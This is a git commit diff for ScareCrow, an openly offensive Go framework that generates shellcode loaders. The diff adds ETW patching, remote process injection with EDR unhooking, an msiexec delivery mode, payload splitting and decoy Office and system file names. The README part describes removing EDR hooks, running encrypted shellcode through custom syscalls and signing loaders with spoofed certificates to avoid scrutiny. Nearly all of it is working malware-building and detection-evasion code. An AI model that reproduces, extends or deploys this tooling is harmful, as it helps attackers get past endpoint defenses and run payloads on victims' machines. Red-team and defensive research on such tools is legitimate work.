Patch 2.0

This commit is contained in:
matthew.eidelberg
2021-05-25 14:51:01 -04:00
parent 294a46336c
commit d3ee2103c6
10 changed files with 2408 additions and 935 deletions
Vendored
BIN
View File
Binary file not shown.
+294 -19
View File
@@ -11,7 +11,7 @@ import (
"io/ioutil"
"log"
"os"
"strconv"
"strings"
"text/template"
)
@@ -30,6 +30,11 @@ type JScriptLoader struct {
type SandboxJScript struct {
Variables map[string]string
}
type ETW struct {
Variables map[string]string
}
type DLL struct {
Variables map[string]string
}
@@ -56,10 +61,11 @@ var (
func FileName(mode string) (string, string) {
var filename string
var name string
wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"}
dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"}
cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"}
officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"}
Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive"}
Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"}
if mode == "excel" {
name = officename[Cryptor.GenerateNumer(0, 9)]
@@ -70,23 +76,62 @@ func FileName(mode string) (string, string) {
filename = name + ".cpl"
}
if mode == "wscript" {
name = dllname[Cryptor.GenerateNumer(0, 10)]
name = wscript[Cryptor.GenerateNumer(0, 10)]
filename = name + ".dll"
}
if mode == "dll" {
name = dllname[Cryptor.GenerateNumer(0, 10)]
name = dllname[Cryptor.GenerateNumer(0, 9)]
filename = name + ".dll"
}
if mode == "msiexec" {
name = dllname[Cryptor.GenerateNumer(0, 9)]
filename = name + ".dll"
}
if mode == "binary" {
name = Binaryname[Cryptor.GenerateNumer(0, 7)]
name = Binaryname[Cryptor.GenerateNumer(0, 8)]
filename = name + ".exe"
}
return name, filename
}
func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool) string {
func ETW_Buff() (string, string) {
var buffer bytes.Buffer
ETW := &ETW{}
ETW.Variables = make(map[string]string)
ETW.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["procEtwNotificationRegister"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["procEtwEventRegister"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["procEtwEventWriteFull"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["hProcess"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["nSize"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["ETW"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["handle"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["dataAddr"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["i"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["data"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9)
ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9)
buffer.Reset()
ETWTemplate, err := template.New("ETW").Parse(Struct.ETW_Function())
if err != nil {
log.Fatal(err)
}
buffer.Reset()
if err := ETWTemplate.Execute(&buffer, ETW); err != nil {
log.Fatal(err)
}
return buffer.String(), ETW.Variables["ETW"]
}
func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool, ETW bool, ProcessInjection string) string {
var LoaderTemplate, DLLStructTemplate string
DLL := &DLL{}
DLL.Variables = make(map[string]string)
@@ -185,6 +230,69 @@ func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, ref
DLL.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["memdata"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["Target"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["addr"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["buf"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["bytes"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["data"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["dll"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["err"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["file"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["hModule"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["handle"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["handleSize"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["hh"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["mi"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["MI"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["mod"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["modules"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["module"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["nLength"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["nSize"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["name"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["needed"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["n"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["outString"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["pi"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["process"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["s"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["si"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["size"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["x"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12)
if sandbox == true {
DLL.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12)
DLL.Variables["domain"] = Cryptor.VarNumberLength(4, 12)
@@ -220,6 +328,14 @@ func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, ref
WindowsVersion.Variables["customsyscallVP"] = DLL.Variables["customsyscallVP"]
buffer.Reset()
if ETW == true {
ETW_Function, ETW := ETW_Buff()
DLL.Variables["ETW"] = ETW + "()"
DLL.Variables["ETW_Function"] = ETW_Function
} else {
DLL.Variables["ETW"] = ""
DLL.Variables["ETW_Function"] = ""
}
if refresher == false {
LoaderTemplate = Struct.WindowsVersion_DLL_Refresher()
DLLStructTemplate = Struct.DLL_Refresher()
@@ -227,6 +343,12 @@ func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, ref
LoaderTemplate = Struct.WindowsVersion_DLL()
DLLStructTemplate = Struct.DLL()
}
if ProcessInjection != "" && refresher == false {
ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1)
DLL.Variables["processpath"] = ProcessInjection
LoaderTemplate = Struct.WindowsVersion_DLL_Refresher()
DLLStructTemplate = Struct.Procces_Injection_DLL()
}
WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(LoaderTemplate)
if err != nil {
@@ -252,12 +374,15 @@ func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, ref
DLL.Variables["ExportName"] = Struct.WS_JS_Export()
}
if mode == "msiexec" {
DLL.Variables["ExportName"] = Struct.WS_JS_Export()
}
buffer.Reset()
DLLTemplate, err := template.New("DLL").Parse(DLLStructTemplate)
if err != nil {
log.Fatal(err)
}
buffer.Reset()
if err := DLLTemplate.Execute(&buffer, DLL); err != nil {
@@ -267,7 +392,7 @@ func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, ref
}
func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string) string {
func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string) string {
var Structure string
var buffer bytes.Buffer
Binary := &Binary{}
@@ -278,8 +403,17 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
Binary.Variables = make(map[string]string)
WindowsVersion := &WindowsVersion{}
WindowsVersion.Variables = make(map[string]string)
splitval := len(b64ciphertext)
splitval = splitval - 45
encodedfirsthalf := string(b64ciphertext[:splitval])
encodedsecondhalf := string(b64ciphertext[splitval:])
Binary.Variables["ciphertext"] = b64ciphertext
Binary.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["b64_string1name"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["b64_string2name"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["b64_string1value"] = encodedfirsthalf
Binary.Variables["b64_string2value"] = encodedsecondhalf
Binary.Variables["key"] = b64key
Binary.Variables["iv"] = b64iv
Binary.Variables["vkey"] = Cryptor.VarNumberLength(4, 12)
@@ -361,9 +495,67 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
Binary.Variables["oldprotect"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["handlez"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["Target"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["buf"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["data"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["err"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["hModule"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["handleSize"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["hh"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["mi"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["MI"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["mod"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["modules"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["module"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["nLength"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["nSize"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["name"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["needed"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["n"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["outString"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["pi"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["process"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["s"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["si"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["size"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12)
WindowsVersion.Variables["Version"] = Binary.Variables["Version"]
WindowsVersion.Variables["syscall"] = Binary.Variables["syscall"]
WindowsVersion.Variables["customsyscall"] = Binary.Variables["customsyscall"]
buffer.Reset()
@@ -379,7 +571,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
Binary.Variables["SyscallNumberlist"] = buffer.String()
buffer.Reset()
if strconv.FormatBool(console) == "true" {
if console == true && ProcessInjection == "" {
Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)"
Binary.Variables["DebugImport"] = "\"io\""
Binary.Variables["Debug"] = `
@@ -404,6 +596,47 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")"
Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")"
} else if console == true && ProcessInjection != "" {
Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)"
Binary.Variables["DebugImport"] = `"io"
"os"`
Binary.Variables["Debug"] = `
var (
debugWriter io.Writer
)
func printDebug(format string, v ...interface{}) {
debugWriter = os.Stdout
output := fmt.Sprintf("[DEBUG] ")
output += format +"\n"
fmt.Fprintf(debugWriter, output, v...)
}
`
Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)"
Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")"
Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")"
Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")"
Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")"
Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")"
Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")"
Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")"
Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")"
Binary.Variables["PPIDMessage"] =
`strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId)
printDebug("[*] Creating Remote Process: " + strpid)
printDebug("[*] Creating Handle to Remote Process")`
Binary.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")"
Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12)
Binary.Variables["RemoteModuleEnumeration"] =
`` + Binary.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Binary.Variables["MI"] + `.LpBaseOfDll)
printDebug("[+] " + ` + Binary.Variables["s"] + ` + "'s Base Address: " + ` + Binary.Variables["addr"] + `)
printDebug("[*] Reloading " + ` + Binary.Variables["s"] + ` + "'s .Text Field")`
Binary.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")"
Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")"
Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")"
Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")"
} else {
Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)"
Binary.Variables["DebugImport"] = ""
@@ -417,6 +650,14 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
Binary.Variables["OverWrittenPoint"] = ""
Binary.Variables["ReloadingMessage"] = ""
Binary.Variables["VersionMessage"] = ""
Binary.Variables["RemoteModuleEnumeration"] = ""
Binary.Variables["PPIDMessage"] = ""
Binary.Variables["ModuleMessage"] = ""
Binary.Variables["RemoteModuleMessage"] = ""
Binary.Variables["RemoteReloading"] = ""
Binary.Variables["Injecting"] = ""
Binary.Variables["Injected"] = ""
}
if sandbox == true {
@@ -448,7 +689,23 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
Binary.Variables["SandboxImport"] = ""
}
Structure = Struct.Binary()
if ETW == true {
ETW_Function, ETW := ETW_Buff()
Binary.Variables["ETW"] = ETW + "()"
Binary.Variables["ETW_Function"] = ETW_Function
} else {
Binary.Variables["ETW"] = ""
Binary.Variables["ETW_Function"] = ""
}
if ProcessInjection != "" {
ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1)
Binary.Variables["processpath"] = ProcessInjection
Structure = Struct.Procces_Injection()
} else {
Structure = Struct.Binary()
}
BinaryTemplate, err := template.New("Binary").Parse(Structure)
if err != nil {
@@ -487,6 +744,12 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool)
JScriptLoader.Variables["filename"] = filename
JScriptLoader.Variables["FileName"] = name
}
if mode == "msiexec" {
LoaderTemplate = Struct.JS_Msiexec_Sub()
JScriptLoader.Variables["dllext"] = ".dll"
JScriptLoader.Variables["filename"] = filename
JScriptLoader.Variables["FileName"] = name
}
if mode == "wscript" {
JScriptLoader.Variables["dllext"] = ".dll"
JScriptLoader.Variables["FileName"] = name
@@ -502,7 +765,6 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool)
JSLoaderTemplate, err := template.New("JScriptLoader").Parse(LoaderTemplate)
if err != nil {
log.Fatal(err)
}
buffer.Reset()
if err = JSLoaderTemplate.Execute(&buffer, JScriptLoader); err != nil {
@@ -561,12 +823,14 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name
JScript.Variables["dllext"] = ".cpl"
JScript.Variables["FileName"] = name
}
if mode == "zip" {
}
if mode == "wscript" {
JScript.Variables["dllext"] = ".dll"
JScript.Variables["FileName"] = name
}
if mode == "msiexec" {
JScript.Variables["dllext"] = ".dll"
JScript.Variables["FileName"] = name
}
buffer.Reset()
JSTemplate, err := template.New("JScript").Parse(Struct.JSfile())
if err != nil {
@@ -632,7 +896,6 @@ func Macro_Buff(URL string, outFile string) {
macroTemplate, err := template.New("macro").Parse(Struct.Macro())
if err != nil {
log.Fatal(err)
}
buffer.Reset()
if err := macroTemplate.Execute(&buffer, macro); err != nil {
@@ -641,13 +904,23 @@ func Macro_Buff(URL string, outFile string) {
fmt.Println(buffer.String())
}
func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool) (string, string) {
func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool, ETW bool, ProcessInjection string) (string, string) {
var code string
name, filename := FileName(mode)
if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" {
code = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox)
if ETW == true {
fmt.Println("[+] Patched ETW Enabled")
}
if ProcessInjection != "" && ETW == true {
fmt.Println("[!] Warning ETW Will Only be Patched in the Primarly Process Not the Created One")
}
if ProcessInjection != "" {
fmt.Println("[+] Process Injection Mode Enabled")
fmt.Println("[*] Created Process: " + ProcessInjection)
}
if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" || mode == "msiexec" {
code = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox, ETW, ProcessInjection)
} else {
code = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name)
code = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection)
}
os.MkdirAll(name, os.ModePerm)
Utils.Writefile(name+"/"+name+".go", code)
@@ -675,6 +948,8 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co
}
} else if mode == "wscript" {
os.Rename(outFile+".dll", name+".dll")
} else if mode == "msiexec" {
os.Rename(outFile+".dll", name+".dll")
} else if mode == "binary" {
os.Chdir("..")
os.Rename(name+"/"+name+".exe", name+".exe")
+59 -40
View File
@@ -1,7 +1,7 @@
<h1 align="center">
<br>
<img src=Screenshots/ScareCrow.png border="2px solid #555">
<img src=Screenshots/ScareCrow.png >
<br>
ScareCrow
</h1>
@@ -9,17 +9,17 @@ ScareCrow
## More Information
If you want to learn more about the techniques utlized in this framework please take a look at [Part 1](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) and [Part 2](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught)
If you want to learn more about the techniques utilized in this framework please take a look at [Part 1](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) and [Part 2](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught)
#
## Description
ScareCrow is a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, utilizing a technique to flush an EDR’s hook out the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute.
ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute.
When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. In order to do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges.
When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges.
Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid being detected by non-userland hooked-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid being detected an any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions.
Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions.
ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialisation vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without an issue because the process we load into will look for those export functions and not worry about DLLMain being there.
ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialization vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there.
### Binary Sample
<p align="center"> <img src=Screenshots/PreRefreshed_Dlls.png border="2px solid #555">
@@ -29,9 +29,9 @@ After
During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things:
* Code signs the Loader:
Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist) ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option.
